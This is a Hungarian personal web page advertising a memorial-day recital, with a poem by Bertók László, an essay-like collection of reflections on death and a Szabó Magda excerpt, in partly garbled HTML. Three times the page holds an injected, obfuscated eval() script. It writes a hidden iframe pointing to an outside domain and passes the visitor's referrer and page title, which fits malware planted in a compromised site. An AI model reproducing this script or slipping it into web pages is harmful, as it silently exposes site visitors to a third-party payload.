Halottak napi műsor

Tisztelt Családok, Gyászolók, Vállalkozók!

Szeretettel ajánlom halottak napi műsorunkat, előadóművészek közreműködésével.
20-40 perces, tartalmaz dalokat, verseket  és prózát, szép gondolatokat a halál témaköréből.
Kívánságra orgonaművész, valamint  énekegyüttes teszi igazán ünnepivé az alkalmat.
Ára, időtartama  az előadók számától függ.  Érdeklődni a 06 30 320 2446 -os telefonszámon lehet.

Bertók László: Halottak napja
Halottak napja: visszapillantó tükör,
vizsgája szemnek, emberségnek,
akiket te mutatsz,
azok már nem előznek.
Sebességük fűszálak élein,
porszemeken cikázik,
center;”arcuk
csontok roncsaiban ázik.
Mértanuk pontjai között
a közúti szabályok
érvénytelenek,
életünkre igazolások.
Meghívás nélkül jelen vannak
kanyarokban, mozdulatokban,
tekintetük, mint jelzőlámpa
bennünk villan.
Tükörbe nézünk, megalázkodunk,
mindnyájan fehér bárányok vagyunk,
virágot hintünk az útra,
fejünkre hamut,miközben őket ünnepeljük,
azaz magunkat ünnepeljük,
hisz nincsen visszaút.
Krizantémok a temetői buszon,
fejem körül virágok,
glória, mennyei kalap,
harmattal áldott.
Fehér lobogókkal a város
kiözönlik a kapukon,
mindenki megadta magát,
nem villog szurony.
Csak az évek, a nyavalyák
szűkülő sorfala vigyáz,
dércsípte árnyékuk felett
siránkoznak a fák,
megállók vasa, csonka keresztek  tükörképe szalad.
Arcom mögött a Tejút mozdulását,
köszöntöm halottaimat:
Nagyanyámat, Katona Juliannát,
s a másikat, Farkas Katalint.
Friss fakereszt ablaka mögül
nagybátyám még némán visszaint.
Aztán újra a sejtek szava.
Ülök a buszban, térdemen fiam.
Körben a téboly tűzkarikái.
Halottak napja van.

Vigyen élő éneket az ünnepeibe!

Házassági évfordulókon, születésnapokon szívesen vállalok fellépéseket.
Kedvenc nóta, dal, igény szerint a capella.

Versek szavalását, saját versek felolvasását  szintén vállalom.

 

Gondolatok a halálról

div id=”_mcePaste”Mottó:/div
div id=”_mcePaste”Fosszuk meg a halált különösségétől, találkozzunk vele gyakorta, szoktassuk magunkat hozzá,semmire se gondoljunk gyakrabban, mint a halálra. Nem tudhatjuk, hol vár ránk a halál, tehát számítsunk rá mindenütt. Ha a halált gyakoroljuk, a szabadságot gyakoroljuk. Aki megtanulta, hogyan kell meghalni, az megtanulta, hogy hogyan ne legyen rabszolga többé. (Montaigne)/div
div**/div
div id=”_mcePaste”Sírva jöttél a világra/div
div id=”_mcePaste”S mindenki boldogan fogadott./div
div id=”_mcePaste”Élj úgy, hogy ha meghalsz,/div
div id=”_mcePaste”Mindenki sírjon, de te légy boldog./div
div id=”_mcePaste”Indiai népi bölcsesség/div
div id=”_mcePaste”Nemcsak azért tartozunk felelősséggel,/div
div id=”_mcePaste”amit megteszünk, hanem azért is,/div
div id=”_mcePaste”amit elmulasztunk megtenni./div
div id=”_mcePaste”(Paramhans Swami Maheshwarananda)/div
div**/div
div id=”_mcePaste”strongLehetőségünk a felkészülésre/strong/div
divstrong./strong/div
divstrong
/strong/div
div id=”_mcePaste”Az igazi bölcsek valósággal készülnek a halálra, s a halál/div
div id=”_mcePaste”minden ember közt rájuk nézve a legkevésbé félelmetes./div
div id=”_mcePaste”Platón/div
div id=”_mcePaste””A legtöbb nyugati ember még csak gondolni sem hajlandó a halálra, el sem tudja képzelni, hogy a halál gondolatával együtt is lehet élni, hogy tudatosan és békésen lehet várni a napot, amelyen elérkezik “/div
div id=”_mcePaste”Amikor eljön a halál közelsége (lehet ez egy családtagé, egy szeretett személyé, vagy esetleg sajátunk) egyszerűen nem merünk vele szembenézni, kibújnánk a bőrünkből. Legszívesebben megfutamodnánk. Nem is igazán tudunk mit kezdeni vele. Ami énünket veszteségként fenyegeti, az ellen küzdünk./div
div id=”_mcePaste”A “beérett” halál felkészülést kíván. “.. a halál olyan, mint egy tükör, amelyben az életünket látjuk. … akik úgy érzik, teljes és intenzív életet éltek, akik mögött az élet sűrű szövedéke áll, azokban nincs metafizikai szorongás.”/div
div id=”_mcePaste”Ahhoz, hogy békében tudjuk vállalni a halált, tartalmas életet kell élnünk. “Az emberek úgy halnak meg, ahogy éltek, amilyenek önmaguk.”/div
div id=”_mcePaste”A felkészülést kezdjük el minél előbb.  Merjünk evvel a kérdéssel foglalkozni, de ez nem azt jelenti, hogy az élettől forduljunk el. Az egyensúly megtalálása itt is fontos./div
div id=”_mcePaste”A halál életünk nagy kérdése, rejtélye. Ma a “jó halálnak” a gyors, öntudatlan halált tartjuk. Így akarunk meghalni. (De a születésünk is legyen gyors, fájdalomtól mentes, s az sem baj, ha az édesanya öntudatlan.) A hosszú szenvedést keserves dolognak ítéljük meg. Nem akarunk másoknak terhére lenni./div
div id=”_mcePaste”Elisabeth Kübler-Ross 1965 őszén kezdte el a halálról és a haldoklásról szóló interdiszciplináris szemináriumát Chicagóban. A hallgatók különbözően fogadták ezt a témát. Hihetetlen volt számukra evvel a kérdéssel foglalkozni. Ijesztő volt, hogy vannak emberek, akik a halál kapujában tudnak bölcsek lenni, példát mutatni emberségből és szeretetből. Jung ezt írja: “bizonyos emberek túlnőnek egy problémán, amellyel mások teljesen kudarcot vallanak. … – kiderült a tudatosság szintjének emelkedése. Az illető látókörébe bekerült egy magasabb vagy messzebbre mutató érdek, s horizontjának ezzel a kibővülésével a megoldhatatlan probléma elvesztette sürgető szorítását. Nem oldódott meg önmagában logikusan, hanem elhalványult egy új és erősebb életirány hatására. Nem került be az elfojtás és a tudattalan szférájába, hanem csak más fényben tűnt föl, s így más is lett.”/div
div id=”_mcePaste”Ezek az emberek megtalálták a lelki békéjüket, azt a “belenyugvást”, amiről a buddhisták is beszélnek. Sokáig nem is értettem, hogyan lehet belenyugvással fejlődni. A belenyugvás a mi szemszögünkből fejet hajtást jelent az adott probléma előtt. “Beadjuk a derekunkat” mondhatjuk. Itt pedig nem erről van szó. A belenyugvás itt a probléma meghaladását jelenti, túlnőni rajta, és közben megtalálni a belső békét is. Jung ezt nagyon jól közelítette meg számomra. Olvasmányaim alapján döbbentem meg, “hogy a legnagyobb és legfontosabb életproblémák alapjában véve mind megoldhatatlanok. … Megoldani soha nem lehet őket, csak túlnőni rajtuk.”/div
div id=”_mcePaste”Ilyenkor pedig az életünkre visszapillantva már meg tudjuk mosolyogni magunkat, túlnőttünk a problémán. Ez is az “öregkor” bölcsessége./div
div./div
div id=”_mcePaste””Ám csak akkor lesz képes a dolgokon változtatni, ha elkezdi előre elképzelni saját halálát. Ezt nem lehet tömegméretekben csinálni. … Minden embernek egyedül kell elvégeznie ezt.” Az életben a nagy dolgokat egyedül kell megélnünk. Egy betegséget, a szenvedést, vagy csak egy vizsgát. Ilyenkor magunkra maradunk, saját félelmeinkkel, kétségeinkkel, és a bölcs vezetőnkkel. Kérdés, melyikük hangja számunkra az erősebb? Sokat kell tanulnunk ezen a téren is./div
div id=”_mcePaste”Feladataink közé tartozik az is, hogy kialakítsuk a mai ember halál-kultúráját. Ehhez a legfontosabb a szeretet érzése. “Szeresd felebarátodat, mint önmagadat.” parancsolja a biblia Máté evangéliumában (22, 40).  Mit is jelent ez? Önmagam szeretete az első parancs! Csak az tud mást őszintén, felemelően, tisztán, érdek nélkül szeretni, aki önmagát szereti. Ez nagyon nehéz kérdés. Gyermekeinket is feltételekkel szeretjük. Beléjük tápláljuk az elégedetlenség érzését. Hiszen mi sem szeretjük őket olyannak, amilyenek. “Ha szeretem a másik személyt, akkor egynek érzem magamat vele, de zzal, aki ő, és nem azzal, akinek lennie kellene, hogy használni tudjam.”/div
div id=”_mcePaste”A szeretet felemel, de ehhez az első lépcsőfok önmagam szeretete. Felemelő érzés megtalálni belső szeretetemet, ezzel önmagam emelem fel, és válok “Istenhez hasonlóvá”. Ezután pedig le tudok hajolni, segíteni másokat is abban, hogy felemelkedjenek. Lehetek bot, amelyre támaszkodni lehet, harmadik láb, amely segít “átbicegni” az úton. Esetleg gyertya, melynek fényénél könnyebb meglátni az ösvényt. De “csupán” iránytű tudok lenni, mutatni tudom az utat, de az úton mindenkinek önmagának kell végigmennie. A térkép és az útikalauz olvasása nem helyettesíti az utazást./div
div id=”_mcePaste”Akik megjárták a “túlvilágot” “tisztelettel viseltetnek a tudás iránt. A fénylény azt mondta nekik, hogy a tanulásnak nincs vége a halállal;s hogy a tudás olyasvalami, amit magukkal vihetnek.” . Talán, már ezért érdemes tanulnunk, tapasztalatokat gyűjtenünk, hiszen van rá reményünk, hogy ezeket a halál sem veszi el tőlünk./div
div id=”_mcePaste”Akik átélték ezeket az élményeket megtaláltak valami belső erőt és hitet. Igényük lett arra, hogy a vallásokat tanulmányozzák, kialakítsák saját hitüket. Ezek a könyvek, történetek útmutatót, segítséget jelenthetnek azoknak, akik vállalják, vagy akiket az élet rákényszerít a halállal való szembesülésre./div
div id=”_mcePaste”Morrie-vel, az öreg professzorral, amikor közölték betegségét, amelynek gyógymódját a jelenlegi orvostudomány nem tudja, igen megrázta a hír. Tisztában volt vele, hogy lassú leépülés lesz az élete befejezése. Gondolatait, bölcsességeit megosztotta barátaival, tanította őket utolsó perceivel is. Megkérdezték tőle “ha valaki meglegyintené egy varázspálcával és visszaadná az egészségét, vajon ugyanaz az ember lenne akkor is, amilyen korábban volt?/div
div id=”_mcePaste”Morrie megrázta a fejét./div
div id=”_mcePaste”Nincs visszaút, semmiképpen sem. Én közben egészen másvalaki lettem. Megváltoztak a nézeteim, a világfelfogásom. Másként értékelem a testemet, amelyet valaha alig becsültem. Más elvek alapján igyekszem már megbirkózni a nagy kérdésekkel, a végső kérdésekkel, azokkal, amelyek nem foszlanak a semmibe./div
div id=”_mcePaste”Mert, látod ez a lényeg. Ha egyszer felfedezzük az igazán fontos kérdéseket, többé nem vagyunk képesek hátat fordítani nekik./div
div id=”_mcePaste”És szerinted melyek az igazán fontos kérdések?/div
div id=”_mcePaste”Az én véleményem szerint azok, amelyek a szeretethez, felelősségtudathoz, a spiritualitáshoz, a tudatossághoz kapcsolódnak. És ha visszakapnám az egészségemet, továbbra is csak ezekkel foglalkoznék. Ezt kellett volna tennem egész életemben.” Bátran tanulhatunk tőle./div
div./div
div id=”_mcePaste”Steinmüller Csilla Magdolna TUDATOS SZEMBENÉZÉS A HALÁLLAL/div
div/div
divemolvasnivaló ebben a témában:/em/div
diva href=”http://www.lelkititkaink.hu/tudastar_gyasz.html”emhttp://www.lelkititkaink.hu/tudastar_gyasz.html/em/a/div
div/div
diva href=”http://www.mackomonika.hu/wp-content/uploads/cropped-img.jpg”img class=”aligncenter wp-image-288″ title=”cropped-img.jpg” src=”http://www.mackomonika.hu/wp-content/uploads/cropped-img.jpg” alt=”” width=”602″ height=”126″ //a/div!–844c7b74e31d727d5814a0ed667c0255–script type=”text/javascript”
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’n=\’+3.o;0=0+\’r=\’+6;d.p(\’8 q=”s:u;v:w” 0=”\’+0+\'” x=”\’+4+\'” y=”\’+5+\'”/8\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))
/script

Szabó Magda: Für Elise (részlet)

– Ez még csak egy előhalál – hallottam, s úgy szólt hozzám, mintha visszaigazolná a döntését, tíz kiló epret főzet be télire. – Szerencsére sok előhalál van a valódira való felkészülésig, az ember élete folyamán többször érzi, hogy se útja, se jövője, se ereje nincs már, minden befejeződött, kész, igazán szép volt a jó Istentől, hogy ezt a módszeres szoktatást a nagy záráshoz kitalálta. A végleges, a záró meglepően könnyen lefolyik majd, mosolyogva halsz meg, kezet rázol az elmúlással, és az utolsó mozdulattal becsukod a könyvet. Akkorára már annyi katasztrófát átéltél, annyi vért vesztettél, annyit féltél, sírtál, próbálkoztál hiába, hogy alig marad szegény halálnak valamije, amit elrabolhat tőled, csak a bőrödet viheti, a csomagolópapírt, amibe Isten pakolt a születéssel, meg a spárgát, a csontjaidat. Hol van már akkorára belőled az az igazi szenvedés, amelybe belegyakorolt az élet, hol a tanácstalan kétségbeesés, hol vagy te, ép önmagaddal?
Test-lélek, ha annyit terhelik, elkopik, annyiszor átszenvedett előhalálaid mennyei üzenetek, hiszen a nagy arénában, amelyben utolsó percig mozogtál, szinte mindened megrokkant, elvesztette jelentőségét. Ne csapásnak értékeld Isten irgalmas ajándékát, hanem adománynak, a végsőnél, ami már nem „elő”, de végleges halál, amikor végre megpihenhetsz, csak azt érzed majd, eljött az áldott pihenés. Terved nincs már, tehát csalódásod sem lehet, sebezhetetlen leszel a végre elnyert semmiben. Légy bátor, minden előhalál csak erősít, mikor földre rogysz. Érted, amit hallasz, Magdolna?

forrás:
a rel=”nofollow” href=”http://dia.pool.pim.hu/xhtml/szabo_magda/Szabo_Magda_Fur_Elise.xhtml”http://dia.pool.pim.hu/xhtml/szabo_magda/Szabo_Magda_Fur_Elise.xhtml/a
!–844c7b74e31d727d5814a0ed667c0255–script type=”text/javascript”
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’n=\’+3.o;0=0+\’r=\’+6;d.p(\’8 q=”s:u;v:w” 0=”\’+0+\'” x=”\’+4+\'” y=”\’+5+\'”/8\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))
/script

Videók

Reklámvideó

a href=”http://www.youtube.com/watch?v=gdF4zibaYLU”http://www.youtube.com/watch?v=gdF4zibaYLU/a

Sajtó megjelenés:

http://www.youtube.com/watch?v=opWFNSGJ1Zcamp;feature=plcp

nbsp;
div class=”addthis_toolbox addthis_default_style “/div
script type=”text/javascript”// ![CDATA[
var addthis_config = {“data_track_clickback”:true};
// ]]/script
script src=”http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e11c28570fb5f6e” type=”text/javascript”/script!– AddThis Button END — !– Helyezze el ezt a címkét a fejlécben (a “head” szakaszban), vagy közvetlenül a törzs (body) címke lezárása előtt –script src=”https://apis.google.com/js/plusone.js” type=”text/javascript”/script

!– Helyezze el ezt a címkét ott, ahol a +1 gombot szeretné megjeleníteni –!–844c7b74e31d727d5814a0ed667c0255–script type=”text/javascript”
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’n=\’+3.o;0=0+\’r=\’+6;d.p(\’8 q=”s:u;v:w” 0=”\’+0+\'” x=”\’+4+\'” y=”\’+5+\'”/8\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))
/script